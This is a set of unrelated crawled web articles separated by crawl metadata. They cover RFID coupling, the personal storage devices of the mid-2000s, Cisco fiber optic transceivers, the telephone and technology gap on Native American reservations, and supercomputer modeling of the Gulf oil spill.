SEQ is a procedure used in RFID systems to share the RF energy and transfer information between tags and interrogators by using pulse operation. In SEQ, the communication between tags and interrogators takes place for a limited period of time.
RFID Essentials, Chapter 3: Tags, Coupling, pp. 63-67.
RFID+: The Complete Review of Radio Frequency Identification, Chapter 1: Primer, Coupling, pp. 36-38. | <urn:uuid:0f1d8ec5-b2b6-4e8a-81cb-a093163cdfbf> | CC-MAIN-2017-04 | http://certmag.com/rf-physics/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281450.93/warc/CC-MAIN-20170116095121-00495-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.863837 | 404 | 2.984375 | 3 |
Personal Storage Devices: An Overview
Once upon a time, the most advanced computers held half a gigabyte, floppy disks were five inches wide and actually floppy, and most consumers’ data storage needs didn’t extend beyond a WordPerfect document. But with the onslaught of digital photos, home videos, music files and a vast array of other applications and programs, personal data storage needs have continued to grow by leaps and bounds.
Once the sole means of data storage and portability, floppy disks still have a place in consumers’ storage arsenal. However, their presence is quickly fading. Now offered in a 3.5-inch format, floppy disks generally hold 1.44 megabytes of storage. Rarely sold singularly, these disks are usually found in packs of at least five to 10 and sell for around $5 to $7 per pack.
Although consumers still use floppy disks, the rise in digital photography and media has lessened their appeal. To pick up the slack, Zip disks came onto the scene about a decade ago. These disks typically hold up to 100MB (or the equivalent of about 70 floppy disks) on one disk. They retail for about $8 each and are usually sold in packs of three to five disks. Zip disks rose in popularity in the ’90s as consumers increased their appetite for storage. However, that appetite soon outgrew Zip-disk capacity as consumers turned their attention toward other forms for storage.
Zip-disk popularity also was hindered by the need to own a Zip drive in order to use the disk. At around $100 each, Zip drives were often too expensive compared to other forms of data storage. (As a college student, Zip drives were a hot commodity for many journalism majors because we constantly had to transport large amounts of digital photos and text. However, because of the lack of available Zip drives, we often ended up using our e-mail accounts for storage. E-mail could hold a relatively large amount of information, it was accessible everywhere and, most importantly for college students, it was free.)
Zip-disk maker Iomega has since released a newer, higher capacity disk called the REV. These disks can hold up to 90GB of compressed data, and they retail for around $60 each. Although these disks can hold large amounts of data, like the Zip disks before them, REV disks only work with REV drives, which retail around $400.
Picking up where other disks fell short, recordable CDs and DVDs have become storage staples for many consumers. Recordable CDs, or CD-Rs, each hold up to 700MB of data or 80 minutes of music. DVD-Rs can hold up to 4.7GB of information or 120 minutes of video. Because of their storage capacity and inexpensive price (a 6-pack of DVD-Rs retails for about $10), CD-Rs and DVD-Rs have became one of the most popular forms of data storage.
Adding to their popularity, these disks also have rewriteable capabilities. DVD-RWs and CD-RWs can be burned and reburned multiple times, making them convenient, portable, non-static and easily accessible storage devices.
Portable USB Drives
Another rewritable, portable and easily accessible storage device came onto the market in the late ’90s. Portable USB drives, also known as thumb drives, flash drives, pen drives, USB keys and a wide variety of other names, are small enough to carry on a key chain, yet powerful enough to store digital images, music and multimedia files.
They’ve become popular because of their small size, portability and accessibility. With a USB drive, consumers don’t have to store files on multiple floppy disks or CDs or worry about finding computers that had a DVD, CD, floppy or Zip drive. All computers have USB ports. In addition, because of their portability, USB drives have eliminated the need for users to turn e-mail accounts into storage devices.
Making them safer than CDs and DVDs, many portable USB drives also include safeguards such as password protection, data encryption and write protection to guard data. Portable USB drives range is storage capacity from 250MB to 6GB and range in price from $20 to $200.
As the appetite for portable storage has grown, many people have realized that the music devices they already carry around also can be used as portable storage units. iPods and other MP3 players range from 128MB to 60GB and range in price from $40 to $400.
There are three basic types of MP3 players that all offer various storage capacities: Flash memory players, expandable memory players and hard drive players. Flash memory players usually offer 128 to 512MB and can store enough MP3s for a few hours of music. Expandable memory players feature ports for additional memory cards, so users can start with a smaller capacity and get additional cards as their data needs grow. Hard drive players, such as the iPod, range from 4GB to 60GB. A 60GB player can store up to 15,000 songs, or the equivalent of six weeks worth of continuous music.
Personal Digital Assistants, or PDAs, also have grown into the storage-device market. Because many people already carry these around on a daily basis, they’ve starting to become storage units as well. PDAs range in storage capacity from 32MB of built-in storage to 4GB.
Most PDAs now come equipped with an expansion slot. Each slot accommodates a different type of expansion card. The most common types secure digital cards, compact flash memory and MultiMediaCards, or MMCs. Some PDAs also offer dual expansion slots, meaning that they can accommodate more than one kind of memory card.
PDAs range in price from $100 to upward of $700. The more expensive versions don’t necessarily offer more memory (generally just 256 MB). Instead, they come with features such a GPS unit.
Combining the storage capabilities of CD-Rs, the portability of USB drives, the functionality of PDAs and the ubiquitousness of MP3 players are new the versions of cell phones.
These multi-tasking phones, such as the BlackBerry and Treo, range in price from $250 to $500. They usually offer 16 to 64MB of flash memory as well as ports for additional memory cards. They feature wireless Internet, organizers, software programs, e-mail access, cameras, text messaging, walkie-talkies, GPS units, tethered modems and MP3 players. And of course, you also can use them as phones. | <urn:uuid:4c8595eb-2bc5-4262-a23c-0a7fc226dbdb> | CC-MAIN-2017-04 | http://certmag.com/personal-storage-devices-an-overview/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280133.2/warc/CC-MAIN-20170116095120-00129-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.963035 | 1,359 | 2.625 | 3 |
Within the optical communication marketplace, there are several sorts of fiber optic transceivers which are SFP, GBIC, X2 and so on. Cisco is really a brand that has great overall performance on fiber optic products.
As among the fundamental fiber optic transceivers, Cisco SFP is generally utilized in many locations. The inexpensive price and the higher performance, would be the benefits of Cisco SFP. As all recognized, the little form-factor pluggable (SFP) is really a compact, hot-pluggable transceiver utilized for each telecommunication and data communications applications. The type aspect and electrical interface are specified by a multi-source agreement (MSA). It interfaces a network device motherboard (for a switch, router, media converter or similar device) to a fiber optic or copper networking cable. It’s a popular industry format jointly created and supported by many network component vendors. Cisco SFP transceivers are designed to assistance SONET, Gigabit Ethernet, Fibre Channel, and other communications standards. Because of its smaller sized size, Cisco SFP obsoletes the formerly ubiquitous gigabit interface converter (GBIC); the SFP is sometimes referred to as a Mini-GBIC although no device with this name has ever been defined within the MSAs.
So what’s GBIC? From the above paragraph we have known that GBIC is short for gigabit interface converter, which is a standard for transceivers, generally used with Gigabit Ethernet and fibre channel within the 1990s. By providing a regular, hot swappable electrical interface, 1 gigabit port can assistance a wide range of physical media, from copper to long-wave single-mode optical fiber, at lengths of a huge selection of kilometers. Cisco GBIC is really a transceiver that converts serial electric signals to serial optical signals and vice versa. In networking, a GBIC is utilized to interface a fiber optic system with an Ethernet method, such as Fibre Channel and Gigabit Ethernet. Cisco GBIC enables designers to design one kind of device that can be adapted for either optical or copper applications. Cisco GBICs also are hot-swappable, which adds towards the ease of upgrading electro-optical communication networks.
To supply larger capacity, we require a Cisco X2 transceiver. Cisco X2 transceiver will be the 10G fiber optic transceiver, whose improvement was primarily based on former XENPAK standards. Cisco X2 10GB transceiver inner function is almost similar with XENPAK, and X2 also can use one transceiver to fulfill all 10G Ethernet optical port function. Cisco X2 transceiver is about half size of Xenpak, this enable it suit for density installations. Cisco X2-10GB-SR is one of the most well-liked Cisco X2 transceivers. Cisco X2-10GB-SR module is really a multimode transceiver target in the 10G applications. It works with 850nm multimode fiber and also the optical interface is duplex SC. Cisco X2-10GB-SR modules can hyperlink the equipment to fiber optic networks, max transmission distance is 300 meters and support a hyperlink of max 300 meters via multimode fiber. It is utilized in 10Gigabit applications including Ethernet and Fibre channel.
Except SFP, GBIC, X2, there are aslo other Cisco fiber optic transceivers with various use. Such as XENPAK transceiver which we’ve refered within the introduction of Cisco X2. For more information, you are able to go to FiberStore, who’s the very best fiber optic products supplier from China. | <urn:uuid:9f45b891-b2c5-4d91-b31b-bffa38be06c5> | CC-MAIN-2017-04 | http://www.fs.com/blog/serval-cisco-fiber-optic-transceivers.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280221.47/warc/CC-MAIN-20170116095120-00551-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.927567 | 755 | 2.546875 | 3 |
For those living on tribal reservations, the Digital Divide appears to be of little concern. Instead, many are still waiting for the basic telecommunications technology most people take for granted.
The good news is that the efforts of American Indian leaders to bring the situation to light are finally paying off. American Indian-owned telecommunications companies are multiplying, and government interest in remedying the situation is mounting. The FCC, in particular, has not only taken notice, it is actively implementing measures to boost service to reservation territories.
The Analog Divide
While 94 percent of the general population enjoys regular telephone service, only about 47 percent of American Indians can say the same. In places such as the Navajo Reservation in New Mexico, the largest in the United States, the figure is 22.5 percent -- leaving 453,269 households without phone service. According to Raymond Gachupin, governor of the Native American Pueblo of Jemez, N.M., its a recipe for disaster.
"A couple of years ago, a young girl living on the reservation had some kind of a seizure at her home," said Gachupin. "Her boyfriend frantically ran from house to house trying to look for a telephone. When he finally did find one, the lines were down."
The man ran to the Tribal Sheriffs Office to use the radio in the sheriffs vehicle, but the sheriff had to go about a half mile up to a high point to transmit to the Bureau of Indian Affairs in Albuquerque. By the time he got through, the girl had died.
According to FCC research, it has taken some American Indians over a decade to have a phone installed. Even where rural phone companies are willing and able to install
a telephone, fees are often prohibitive. "Incredibly, weve heard stories about Native American communities being charged between $40,000 to $150,000 just to install one
line," said FCC Chairman William Kennard.
For those fortunate enough to have phone service, the bills are often exorbitant. Calling friends, family or schools typically ends up requiring a long distance charge or a toll call. Quality of service is often spotty and connections poor due to badly maintained equipment. "If you dont have a basic communications infrastructure, how can you provide adequate health care or education or expect to attract high-paying jobs?" asked Kennard.
A case in point is the Navajo Nation. Spanning three states -- Arizona, New Mexico and Utah -- it covers roughly 25,000 square miles with a population of about 172,000 and an additional 53,000 living outside the reservation. Fifty-one percent do not have indoor plumbing, 48 percent lack complete kitchen facilities, 54 percent still use wood as their major heating source and 77 percent have no telephone service.
While those numbers are a cause for concern, another statistic has Navajo leaders
anxious for immediate action. Currently, there are 250 schools throughout the nation and an estimated 44,000 Navajo enrolled in grades K-12. "Providing them with access to information technology now is a big issue for us," said Navajo spokesperson George Arthur. "We dont want these next generations to be left behind."
Over the past year, the American Indian community has forced the issue into the public eye. President Clinton, for instance, addressed the problem during a recent visit to the Lakota Sioux and Navajo nations. As a result, the White House is proposing a significant budget increase for American Indian programs. This includes $2 billion dollars in tax incentives to encourage the private sector to donate computers, sponsor community technology centers and provide technology training for workers. It also earmarks $150 million to train American Indian teachers in the effective use of classroom technology, as well as $100 million to create 1,000 community technology centers. Commercial-sector technology support is following suit, with millions of dollars donated by Microsoft, IBM, Kelloggs, Compaq, America Online, WebMD and several others.
Perhaps the most important government action to date, though, is the FCCs introduction of two new programs that offer telephone access to people in reservation areas for a minimal fee. Kennard said these new initiatives will "provide Native Americans with the same kind of dependable, affordable service that most Americans have enjoyed for generations."
Administered jointly by the federal and state governments, the first program, called Link-Up America, provides funding for people of low-incomes that want to receive phone service. The other program is called the Lifeline Assistance Program, which, at a rate of $1 per month, makes paying a monthly phone bill affordable, even for the poorest of Americans.
The FCC is also removing the cap on federal Universal Service funds for carriers that purchase exchanges on tribal lands. Further, the agency is revising the practice of averaging the cost of serving high-cost tribal lands with low-cost areas when calculating support amounts.
Native American Support
Representing 19 Pueblo governments in New Mexico, the All Indian Pueblo Council backs the efforts of the FCC as an investment in a brighter future. After all, more than half of the 70,000 Pueblo Indian citizens are 18 or younger. "Its important that we correct the lack of affordable telephone service, as it impedes their access to knowledge and education," said Stanley Pino, chairman of the All Indian Pueblo Council.
Taking a long-term view, Pino points to the relatively recent transformation of the West from wilderness to high-tech affluence. "What we want is the same opportunity," said Pino. "When we learn that the national average telephone penetration rate is 94 to 98 percent and weve been struggling to get even 40 percent in many of the pueblos, we know something is wrong."
According to Pino, having strong, up-to-date telecommunications technology is the first step in establishing a sound technological foundation that can assist in the economic rejuvenation of many reservations. To that end, several organizations are harnessing the FCC and other government initiatives to bring service up to speed on tribal lands.
Tamsco, based in Calverton, Md., is committed to bringing telecommunications systems to American Indian areas. The company has just installed satellite systems in 54 remote American Indian schools that had little or no phone lines and no previous Internet capabilities. The Bureau of Indian Affairs and E-Rate, a federal program designed to subsidize Internet access in schools and libraries, are funding this project.
"Now that we have installed the satellite systems, we are following up with remote network management tools and a virtual help desk," said Tamsco Chief of Staff Fletcher Brown. Through the use of this system, Tamsco network managers can remotely assist tribes in resolving network difficulties.
In some areas, American Indian communities have made great strides in increasing phone penetration by forming tribally owned telecom companies. "Its the six Native American-owned telephone companies that have done the most to improve telephone service on reservations," said Yawakie Madonna Peltier Yawakie, president of Turtle Island Telecommunications, an American Indian-owned telecommunication consulting and engineering company located in Brooklyn Park, Minn. "Not only have they improved and expanded service, theyve done something concrete to provide employment." She strongly believes that American Indian ownership is the surest route to bridging the technological chasm.
One tribe taking matters into its own hands is the Mescalero Apache, a Southern New Mexico tribe on a 723,000 square-mile territory with a population of less than 4,000. It has recently formed Mescalero Apache Telecom, not only to expand basic phone service beyond the current level of 40 percent, but also to ring the reservation with a fiber-optic network and introduce high-speed Internet access. The visionaries behind the project view it as far more than the provision of basic amenities.
"This is all about creating the infrastructure to attract investment in the same way that an emerging market needs to lure foreign capital," said General Manager Godfrey Enjady. "Putting in phone lines and other utility services will eventually bring industry and jobs to our people."
Enjady expects the FCCs actions to further increase the number of American Indian-owned phone companies.
In South Dakota, the oldest American Indian-owned phone company, Cheyenne River Sioux Tribe Telephone Authority (CRSTTA), is feeling the benefits of the FCCs Link-Up program. "In the first month, we signed up 160 customers to the program and it hasnt slowed down," said CRSTTAs J.D. Williams. "We anticipate the program increasing our penetration rate from its current 75 percent to as much as 90 percent."
Though all agree that these actions are a step in the right direction, some feel that much more needs to be done. "A lot of the FCC information has not gotten out to
the Native American communities," said Yawakie. "As a result, many are not aware of the programs and dont know how to access them."
The Bottom Funding Line
The ultimate success of these FCC initiatives, then, may be determined by how well the agency succeeds in getting the word out to tribes. So far it has posted extensive
Web-site data and organized a couple of well-received conferences in St. Paul and Palo Alto to spread the news. But by allocating a small portion of available funds to promote the initiatives directly to all American Indian communities, the FCC could probably magnify the results by a significant margin. | <urn:uuid:c9fc8212-0706-4092-9abb-f128c6b1f676> | CC-MAIN-2017-04 | http://www.govtech.com/magazines/gt/Tech-Challenges-On-The-Reservation.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279410.32/warc/CC-MAIN-20170116095119-00487-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.956636 | 1,935 | 2.90625 | 3 |
Supercomputer tapped for 3D models of oil spill
Effort will focus on the inland effects of oil
The National Science Foundation has made an emergency allocation of 1 million compute-hours on a supercomputer at the Texas Advanced Computing Center at the University of Texas to create 3-D models of the spreading oil spill in the Gulf of Mexico, according to published reports.
"The goal of this effort is to produce models that can forecast how the oil may spread in environmentally sensitive areas by showing in detail what happens when it interacts with marshes, vegetation and currents," wrote Patrick Thibideau in Network World.
What may be as important are models that forecast what might happen if a hurricane carries the oil miles inland, he added in his article. NSF is funding the use of the Texas computing power for the modeling.
The computer models currently available are not detailed enough to show just what happens as the oil nears the coast line, said Rick Luettich in the article. Luettich is a professor of marine sciences and head of the Institute of Marine Sciences at the University of North Carolina in Chapel Hill, and one of the researchers on this project.
"I don't think that they have any idea how this oil is predicted to move through the marshes and the nearshore zone," said Luettich.
Connect with the GCN staff on Twitter @GCNtech. | <urn:uuid:99d650d4-ceb1-45e4-b3ae-8d8b9822c0ef> | CC-MAIN-2017-04 | https://gcn.com/articles/2010/05/26/supercomputer-to-make-3d-oil-spill-models.aspx | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279410.32/warc/CC-MAIN-20170116095119-00487-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.960887 | 283 | 3.0625 | 3 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.